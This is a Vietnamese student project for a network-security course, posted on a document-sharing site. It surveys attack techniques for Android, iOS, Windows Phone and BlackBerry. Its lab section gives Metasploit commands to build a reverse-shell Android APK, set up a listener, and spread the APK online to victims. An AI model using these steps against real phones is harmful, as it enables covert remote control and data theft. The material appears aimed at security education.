1. Trang chủ
  2. » Luận Văn - Báo Cáo

Tìm Hiểu Một Số Kỹ Thuật Tấn Công Điện Thoại Di Động

15 905 7

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 15
Dung lượng 2,82 MB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

DANH MỤC HÌNHHình 1.1 Cấu trúc hệ điều hành Android...6 Hình 1.2 Cấu trúc Windows Phone...8 Hình 3.1 tạo file apk với tên huynhthanhcuong...9 Hình 3.2 giao diện Metasploit...10 Hình 3.3

Trang 1

TRƯỜNG CAO ĐẲNG CNTT HỮU NGHỊ VIỆT – HÀN

KHOA CÔNG NGHỆ THÔNG TIN

ĐỒ ÁN MÔN AN NINH MẠNG

ĐỀ TÀI

TÌM HIỂU MỘT SỐ KĨ THUẬT TẤN CÔNG THIẾT BỊ ĐIỆN THOẠI DI ĐỘNG

GVHD: Th.S Lê Tự Thanh NHÓM 4: Trần Văn Lợi

Huỳnh Thanh Cường LỚP: CCMM07A

Đà Nẵng, ngày 15 tháng 3 năm 2015

Trang 2

MỤC LỤC

MỤC LỤC 1

DANH MỤC HÌNH 2

Chương I: GIỚI THIỆU TỔNG QUAN VỀ AN NINH MẠNG 4

1.1 Giới thiệu An ninh mạng 4

1.2 Tình hình An ninh mạng thế giới 4

1.3 Tình hình An ninh mạng Việt Nam 4

1.4 Tình hình An ninh mạng trên các thiết bị di động 5

Chương II TÌM HIỂU MỘT SỐ KỸ THUẬT TẤN CÔNG THIẾT BỊ ĐIỆN THOẠI DI ĐỘNG 6

2.1 Hacking Android iOS 6

2.2 Hacking iOS: 7

2.3 Hacking Windows Phone OS 7

2.4 Hacking BlackBerry 8

Chương III: MÔ PHỎNG KỸ THUẬT TẤN CÔNG NỀN TẢNG DI ĐỘNG 9

3.1 Mô phỏng hacking Android OS 9

3.1.1 Chuẩn bị: 9

3.1.2 Thông tin ban đầu: 9

3.1.3 Các bước tiến hành: 9

3.2 Kết luận 14

Tài Liệu Tham Khảo 14

Trang 3

DANH MỤC HÌNH

Hình 1.1 Cấu trúc hệ điều hành Android 6

Hình 1.2 Cấu trúc Windows Phone 8

Hình 3.1 tạo file apk với tên huynhthanhcuong 9

Hình 3.2 giao diện Metasploit 10

Hình 3.3 sử dụng khai thác đa xử lý và cấu hình chuyển đổi các tải trọng Metasploit.11 Hình 3.4 Giao diện của máy ảo chạy hệ điều hành android 11

Hình 3.5 Giao diện máy ảo chạy hệ điều hành android khi đã kích hoạt file huynhthanhcuong.apk 12

Hình 3.6 Máy tấn công đã nhận kết nối từ máy nạn nhân 12

Hình 3.7 Danh sách các thư mục trong máy điện thoại Android 13

Hình 3.8 Thực hiện download file huynhthanhcuong.apk trong thư mục download của máy Android 13

Trang 4

LỜI NÓI ĐẦU

Thế kỉ XXI, song song với tốc độ phát triển đến chóng mặt của lĩnh vực công nghệ thông tin thì phát triển ứng dụng, thiết bị di động trở thành xu hướng hợp thời Hiện nay, trên thế giới đời sống kinh tế tăng cao nhu cầu sử dụng công nghệ của con người ngày càng lớn với nhiều mục đích khác nhau Do đó, theo thống kê của IDC, chỉ tính riêng khu vực Châu Á – Thái Bình Dương trong quý 2/2014, đã có 13,8 triệu thiết

bị di động được sản xuất và tiêu thụ ở khu vực Năm 2014, riêng trong vòng 1 quý, tốc

độ tăng trưởng sản xuất và tiêu thụ smartphone đã tăng từ 16-24%, dẫn đến yêu cầu phát triển ứng dụng trên thiết bị di động như vũ bão Cơn sốt smartphone khiến tất cả các doanh nghiệp sản xuất ứng dụng phải giải quyết bài toán lập trình nên các ứng dụng vừa đẹp, vừa tiện dụng, vừa hay, phù hợp với thị hiếu và nhu cầu của người dùng Smartphone trở thành vật bất ly thân với rất nhiều người vì khả năng sử dụng linh hoạt của nó hoặc hầu hết người dùng thường lưu danh bạ, tin nhắn, email hay hình ảnh mà thậm chí có thể là những thông tin tài chính cá nhân hay những tài liệu công việc quan trọng trong điện thoại Và hơn hết, chúng ta đang sống trong một thế giới nơi mọi thứ đều kết nối với nhau, smartphone là công cụ có thể liên tục theo dõi vị trí của người dùng để lập ra một hồ sơ chi tiết những địa điểm mà họ thường đến Do vậy, smartphone trở thành mục tiêu tối quan trọng cho các hacker, thực tế cho thấy các thiết

bị di động smartphone sử dụng các hệ điều hành như iOS, Android, Blackbarry, đang là mục tiêu tấn công của nhiều hacker thông qua phần mềm độc hại Theo hãng bảo mật NetQin(Trung Quốc) cho hay: Nữa đầu năm 2012, hãng này phát hiện 17676 chương trình phần mềm độc hại trên smartphone tăng gấp 42% so với 6 tháng cuối năm 2011 Trong một báo cáo chi tiết bảo mật di động trên thế giới, các công ty phát hiện khoảng 3,7 triệu điện thoại bị nhiễm phần mềm độc hại đa phần dành cho Android chiếm 78% chỉ trong một tháng, phần còn lại là trên hệ điều hành Symbian của Nokia Phần mềm độc hại được phát hiện nhiều nhất ở Trung Quốc, Nga, Mỹ

Đây là lí do nhóm chúng em lựa chọn “Tìm Hiểu Một Số Kỹ Thuật Tấn Công Thiết Bị Điện Thoại Di Động” làm đề tài đố án môn An Ninh Mạng.

Qua đây, nhóm chúng em xin được gửi lời cảm ơn chân thành đến thầy Lê Tự Thanh đã tận tình hướng dẫn, giúp đỡ, định hướng cho nhóm thực hiện thành công đề tài này!

Trang 5

Chương I: GIỚI THIỆU TỔNG QUAN VỀ AN NINH MẠNG

1.1 Giới thiệu An ninh mạng

An ninh mạng là lĩnh vực có nhiệm vụ bảo vệ các thông tin cá nhân và những hoạt động liên quan đến chiếc máy tính bằng cách phát hiện, ngăn chặn

và ứng phó với các cuộc tấn công từ bên ngoài; bảo vệ hệ thống mạng không bị phá hoại về phần cứng hay chỉnh sửa dữ liệu; cung cấp giải pháp, chính sách bảo vệ máy tính, hệ thống mạng nhằm ngăn cản người dùng trái phép hay mã độc hại xâm nhập vào

Các yếu tố cần bảo vệ:

- Dữ liệu

- Tài nguyên hệ thống

- Danh tiếng của dữ liệu khi bị đánh cắp

1.2 Tình hình An ninh mạng thế giới

Tình hình an ninh mạng trên thế giới trở nên khó lườn hơn bao giờ hết Lực lượng tội phạm mạng ngày càng đông đảo, tinh vi gây ra vô vàng trở ngại trong việc bảo mật, thiệt hại lớn trên thế giới Theo thống kê của trung tâm Nghiên cứu Chiến lược và Quốc tế(CSIS) Hoa Kì, tổng thiệt hại của cả thế giới ước đạt

445 tỷ USD Thế giới đã chứng kiến nhiều website của các tên tuổi tập đoàn lớn cũng từng bị hacker tấn công gây hậu quả lớn như JP Morgan, Bank of America, Citigroup, Ebay

1.3 Tình hình An ninh mạng Việt Nam

Tình hình an toàn, an ninh mạng tại Việt Nam tiếp tục diễn biến phức tạp, tồn tại nhiều cơ sở gây nguy cơ bị tấn công, phá hoại hạ tầng mạng thông tin, ảnh hưởng tới an ninh quốc gia

Từ báo cáo của Kaspersky và Symantec cho thấy, Việt Nam đứng thứ 3 (3,96%) sau Nga (40%) và Ấn Độ (8%) về số dùng di động bị mã độc tấn công nhiều nhất trên thế giới, thứ 6 trên thế giới về số lượng địa chỉ IP trong nước được dùng trong các mạng máy tính ma tấn công nước khác; thứ 7 trên thế giới

về phát tán tin nhắn rác (giảm 1 bậc so tháng 11/2013) và đứng thứ 12 trên thế giới về các hoạt động tấn công mạng

Riêng năm 2014, Bộ Công an phát hiện gần 6.000 trang bị tấn công, chiếm quyền quản trị, chỉnh sửa nội dung (có 246 trang tên miền gov.vn) Đặc biệt, sau sự kiện giàn khoan HD 981 hạ đặt trái phép trong vùng đặc quyền kinh tế Việt Nam, tin tặc nước ngoài đã tấn công hơn 700 trang mạng Việt Nam và hơn

400 trang trong dịp Quốc khánh (2/9) để chèn các nội dung xuyên tạc chủ quyền của Việt Nam với quần đảo Hoàng Sa Có 220 website của Việt Nam đã

bị Hacker Trung Quốc tấn công

Trang 6

Vào cuối năm 2014, tin tặc cũng đã mở đợt tấn công vào trung tâm dữ liệu của VCCorp khiến nhiều tờ báo mà công ty này đang vận hành kỹ thuật như Dân trí, Người lao động, Soha, VNEconomy, Kenh14… bị tê liệt

Theo khảo sát của Bkav, 12/2014, người dùng Việt Nam tổn thất thiệt hại lên đến 8.500 tỷ đồng do các sự cố từ virus máy tính, chiếm 1% tổng thiệt hại của thế giới

Các cuộc tấn công chủ yếu đến từ:

- Tin nhắn rác

- Wifi miễn phí ở Việt Nam

- Làm máy tính nhiễm virus từ USB

- Các ứng dụng giã mạo trên di động

- Mã độc

- DDoS

1.4 Tình hình An ninh mạng trên các thiết bị di động

Theo hãng bảo mật NetQin(Trung Quốc) cho hay: Nữa đầu năm 2012, hãng này phát hiện 17676 chương trình phần mềm độc hại trên smartphone tăng gấp 42% so với 6 tháng cuối năm 2011 Trong một báo cáo chi tiết bảo mật di động trên thế giới, các công ty phát hiện khoảng 3,7 triệu điện thoại bị nhiễm phần mềm độc hại đa phần dành cho Android chiếm 78% chỉ trong một tháng, phần còn lại là trên hệ điều hành Symbian của Nokia Phần mềm độc hại được phát hiện nhiều nhất ở Trung Quốc, Nga, Mỹ

Trang 7

Chương II TÌM HIỂU MỘT SỐ KỸ THUẬT TẤN CÔNG

THIẾT BỊ ĐIỆN THOẠI DI ĐỘNG

2.1 Hacking Android iOS

Android là một đống phần mềm được phát triển bởi Google riêng cho thiết bị di động như điện thoại thông minh và máy tính bảng Nó bao gồm một hệ thống điều hành, middleware và các ứng dụng quan trọng hệ điều hành di động Android được dựa trên nhân Linux Các ứng dụng Android chạy trong một sandbox

Các tính năng của hệ điều hành Android bao gồm:

- Khung ứng dụng cho phép tái sử dụng và thay thế linh kiện

- Máy ảo Dalvik được tối ưu hóa cho các thiết bị di động

- Tích hợp trình duyệt dựa trên các công cụ WebKit mã nguồn mở

- SQLite để lưu trữ dữ liệu © Truyền thông hỗ trợ cấu trúc cho âm thanh phổ biến, video, và vẫn còn các định dạng hình ảnh (MPEG4, H.264, MP3, AAC, AMR, JPG, PNG, GIF)

- Môi trường phát triển phong phú bao gồm một trình giả lập thiết bị, công cụ

để gỡ lỗi, bộ nhớ và hiệu suất profiling, và một plugin cho Eclipse IDE Cấu trúc hệ điều hành Android:

Hình 1.1 Cấu trúc hệ điều hành Android

Trang 8

Một số kĩ thuật tấn công Thiết bị di động Android:

2.2 Hacking iOS:

iOS là một hệ điều hành điện thoại di động được phát triển bởi Apple và phân phối độc quyền cho phần cứng của Apple Ban đầu, iOS được công bố năm 2007 cho iPhone, sau đó được mở rộng để hỗ trợ các thiết bị khác của Apple như iPod Touch (tháng 9 năm 2007), iPad (tháng 1 năm 2010), iPad Mini (tháng 11 năm 2012)

và thế hệ thứ hai của Apple Ttivi trở đi (tháng 9 năm 2010)

Đến cuối năm 2011, iOS chiếm 60% thị phần điện thoại thông minh và máy tính bảng Cuối năm 2012, iOS chiếm 21% thị phần hệ điều hành điện thoại thông minh trên thị trường và 43,6% thị trường hệ điều hành máy tính bảng Và đến tháng 6 năm 2014, App Store của Apple chứa hơn 1.200.000 ứng dụng iOS, và được tải về hơn 60 tỷ lần

Kĩ thuật tấn công Thiết bị di động iOS:

Jailbreaking là một phương pháp của việc kiểm soát của hệ điều hành iOS được

sử dụng trên các thiết bị của Apple Nó làm giãn các thiết bị từ những rào cản của sự phụ thuộc vào các ứng dụng mã nguồn độc quyền của Apple và cho phép người dùng

sử dụng các ứng dụng của bên thứ ba không có sẵn tại các cửa hàng ứng dụng chính thức Nó được thực hiện bằng cách cài đặt một bộ sửa đổi của các bản vá lỗi kernel cho phép bạn chạy các ứng dụng của bên thứ ba không có chữ ký của các nhà cung cấp

hệ điều hành Nó được sử dụng để thêm nhiều chức năng hơn cho các tiện ích của Apple chuẩn Nó cũng có thể cung cấp quyền truy cập root vào hệ thống điều hành và cho phép tải về các ứng dụng của bên thứ ba, chủ đề, phần mở rộng, vv Điều này loại

bỏ các hạn chế sandbox, cho phép các ứng dụng độc hại để truy cập tài nguyên di động hạn chế và thông tin

Khi Jailbreak sẽ hình thành rủi ro khác cho thiết bị của bạn bao gồm:

- Bãi bỏ bảo hành của điện thoại của bạn

- Hiệu suất kém

- Bricking thiết bị

- Nhiễm phần mềm độc hại

2.3 Hacking Windows Phone OS

Windows Phone 8 là hệ điều hành thế hệ thứ hai được phát triển bởi Microsoft cho Windows Phone

Đặc điểm quan trọng của Windows Phone 8:

- Nó cho phép các thiết bị có màn hình lớn hơn và bộ vi xử lý đa lõi lên tới 64 lõi

- Thành phần cốt lõi của Windows 8, bao gồm cả hạt nhân, hệ thống tập tin, trình điều khiển, mạng stack, các thành phần an ninh, phương tiện truyền thông và hỗ trợ đồ họa

Trang 9

- Internet Explorer 10, công nghệ bản đồ của Nokia, và nền đa nhiệm.

- Hỗ trợ mã nguồn gốc (C và C ++), đơn giản hóa porting từ các nền tảng như Android, Symbian, và iOS

- Nhà cung cấp kiểm soát và xây dựng thương hiệu của nguyên tố "ví tiền" là

có thể thông qua SIM hoặc phần cứng điện thoại

- Unified Extensible Firmware Interface (UEFI) giao thức khởi động an toàn

và Firmware qua mạng không cho cập nhật Windows Phone

- Cải thiện hỗ trợ cho lưu trữ di động và chia sẽ tin cậy

Hình 1.2 Cấu trúc Windows Phone

2.4 Hacking BlackBerry

BlackBerry OS là một hệ điều hành điện thoại di động độc quyền được phát triển bởi Research In Motion (RIM) cho dòng BlackBerry của điện thoại thông minh và các thiết bị cầm tay

Để tấn công hệ điều hành BlackBerry chúng ta sẽ khai thác Dịch Vụ Tin Nhắn Ngắn - Short Message Service (SMS)

Một số kỹ thuật như:

- SMS Backdoor

- Khai thác Email

- Phần mềm gián điệp FinSpy Mobile

Trang 10

Chương III:

MÔ PHỎNG KỸ THUẬT TẤN CÔNG NỀN TẢNG DI ĐỘNG

3.1 Mô phỏng hacking Android OS

3.1.1 Chuẩn bị:

+ 1 máy ảo cài hệ điều hành kali linux

+ 1 máy cài android 4.4

3.1.2 Thông tin ban đầu:

+ Địa chỉ IP máy tấn công 192.168.159.132

+ Cổng nhận kết nôi 443

3.1.3 Các bước tiến hành:

Bước 1: trong cửa sổ terminal của máy ảo kali linux tạo 1 file

huynhthanhcuong.apk

Bằng lệnh “msfpayload android/merterpreter/reverse_tcp lhost = <Địa chỉ IP của

máy tấn công> lport <Cổng nhận kết nối > R > < tên file apk>”

(sử dụng khung tải trọng Metasploit để khai thác)

Hình 3.1 tạo file apk với tên huynhthanhcuong.

Trang 11

Bước 2: Gõ msfconsole đến đến giao diện điều khiển Metasploit

Hình 3.2 giao diện Metasploit

Bước 3: Vì tải trọng ban đầu là reverse_tcp nơi kẻ tấn công mong đợi các nạn nhân để kết nối với máy tấn công,máy tấn công phải thiết lập xử lý để xử lý những kết nối vào cổng đã được quy định ở trên

Gõ lệnh :

Use exploit/multi/handler ( sử dụng bộ xử lý Metasploit , khai thác đa xử lý)

Set payload android/meterpreter/reverse_tcp ( Đảm bảo tải trọng trùng với bước 1 ) Bước 4: Cấu hình chuyển đổi cho các tải trọng Metasploit , đã xác định trong bước 3

Gõ lệnh:

Set lhost 192.168.159.132 (Địa chỉ IP máy tấn công)

Set lport 443 (Cổng lắng nghe các kết nối đảo ngược)

Exploit (Bắt đầu lắng nghe kết nối)

Trang 12

Hình 3.3 sử dụng khai thác đa xử lý và cấu hình chuyển đổi các tải trọng Metasploit

Bước 5: Chia sẽ file với đuôi apk vừa tạo lên internet để cho máy nạn nhân tải và cài vào máy

Hình 3.4 Giao diện của máy ảo chạy hệ điều hành android.

Trang 13

Hình 3.5 Giao diện máy ảo chạy hệ điều hành android khi đã kích hoạt file

huynhthanhcuong.apk

Hình 3.6 Máy tấn công đã nhận kết nối từ máy nạn nhân

Trang 14

Tới đây máy tấn công đã được bên trong nạn nhân là điện thoại android , có thể làm mọi thứ với điện thoại của nạn nhân.

Hình 3.7 Danh sách các thư mục trong máy điện thoại Android.

Hình 3.8 Thực hiện download file huynhthanhcuong.apk trong thư mục download của

máy Android

Trang 15

3.2 Kết luận

- Không nên cài đặt file Apk từ nguồn không rõ

- Nếu thật sự muốn cài file Apk từ nguồn không rõ thì phải xem và kiểm tra mã nguồn

(Mã nguồn tham khảo tại Hacking - tutorial com)

Tài Liệu Tham Khảo

[1] Bộ CEHv8 Module 16 Hacking Mobile Platforms, Module 16- Hacking Mobile Platforms

[2] http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.PXFG0pvc.h68PJa1W.dpbs

Ngày đăng: 24/04/2016, 14:43

HÌNH ẢNH LIÊN QUAN

Hình 1.1 Cấu trúc hệ điều hành Android - Tìm Hiểu Một Số Kỹ Thuật Tấn Công Điện Thoại Di Động
Hình 1.1 Cấu trúc hệ điều hành Android (Trang 7)
Hình 1.2 Cấu trúc Windows Phone - Tìm Hiểu Một Số Kỹ Thuật Tấn Công Điện Thoại Di Động
Hình 1.2 Cấu trúc Windows Phone (Trang 9)
Hình 3.1 tạo file apk với tên huynhthanhcuong. - Tìm Hiểu Một Số Kỹ Thuật Tấn Công Điện Thoại Di Động
Hình 3.1 tạo file apk với tên huynhthanhcuong (Trang 10)
Hình 3.2 giao diện Metasploit - Tìm Hiểu Một Số Kỹ Thuật Tấn Công Điện Thoại Di Động
Hình 3.2 giao diện Metasploit (Trang 11)
Hình 3.3 sử dụng khai thác đa xử lý và cấu hình chuyển đổi các tải trọng Metasploit - Tìm Hiểu Một Số Kỹ Thuật Tấn Công Điện Thoại Di Động
Hình 3.3 sử dụng khai thác đa xử lý và cấu hình chuyển đổi các tải trọng Metasploit (Trang 12)
Hình 3.4 Giao diện của máy ảo chạy hệ điều hành android. - Tìm Hiểu Một Số Kỹ Thuật Tấn Công Điện Thoại Di Động
Hình 3.4 Giao diện của máy ảo chạy hệ điều hành android (Trang 12)
Hình 3.5 Giao diện máy ảo chạy hệ điều hành android khi đã kích hoạt file - Tìm Hiểu Một Số Kỹ Thuật Tấn Công Điện Thoại Di Động
Hình 3.5 Giao diện máy ảo chạy hệ điều hành android khi đã kích hoạt file (Trang 13)
Hình 3.6 Máy tấn công đã nhận kết nối từ máy nạn nhân - Tìm Hiểu Một Số Kỹ Thuật Tấn Công Điện Thoại Di Động
Hình 3.6 Máy tấn công đã nhận kết nối từ máy nạn nhân (Trang 13)
Hình 3.7 Danh sách các thư mục trong máy điện thoại Android. - Tìm Hiểu Một Số Kỹ Thuật Tấn Công Điện Thoại Di Động
Hình 3.7 Danh sách các thư mục trong máy điện thoại Android (Trang 14)
Hình 3.8 Thực hiện download file huynhthanhcuong.apk trong thư mục download của - Tìm Hiểu Một Số Kỹ Thuật Tấn Công Điện Thoại Di Động
Hình 3.8 Thực hiện download file huynhthanhcuong.apk trong thư mục download của (Trang 14)

TỪ KHÓA LIÊN QUAN

🧩 Sản phẩm bạn có thể quan tâm

w